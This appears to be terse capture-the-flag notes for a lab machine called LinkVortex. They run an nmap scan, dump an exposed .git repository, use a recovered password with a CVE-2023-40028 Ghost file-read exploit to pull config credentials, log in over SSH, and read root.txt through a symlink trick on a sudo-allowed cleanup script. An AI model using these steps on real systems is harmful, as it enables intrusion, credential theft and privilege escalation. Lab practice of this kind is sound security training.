10.10.11.47
└─$ nmap -A 10.10.11.47 -p 1-65535 -T5 -Pn                          
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-02 20:45 CET
Warning: 10.10.11.47 giving up on port because retransmission cap hit (2).
Stats: 0:00:44 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 90.44% done; ETC: 20:45 (0:00:05 remaining)
Nmap scan report for 10.10.11.47
Host is up (0.048s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3ef8b968c8eb570fcb0b47b9865083eb (ECDSA)
|_  256 a2ea6ee1b6d7e7c58669ceba059e3813 (ED25519)
80/tcp    open     http    Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache
22461/tcp filtered unknown
24038/tcp filtered unknown
40257/tcp filtered unknown
46237/tcp filtered unknown
61324/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


└─$ python GitHack.py -u http://dev.linkvortex.htb/.git/ 
w explorator plikow

OctopiFociPilfer45

└─$ ./CVE-2023-40028 -u admin@linkvortex.htb -p OctopiFociPilfer45 -h linkvortex.htb

/var/lib/ghost/config.production.json


"user": "bob@linkvortex.htb",
"pass": "fibber-talented-worth"

ssh bob@10.10.11.47 

ln -s /root/root.txt exp.txt
ln -s exp.txt exp.png

sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh exp.png





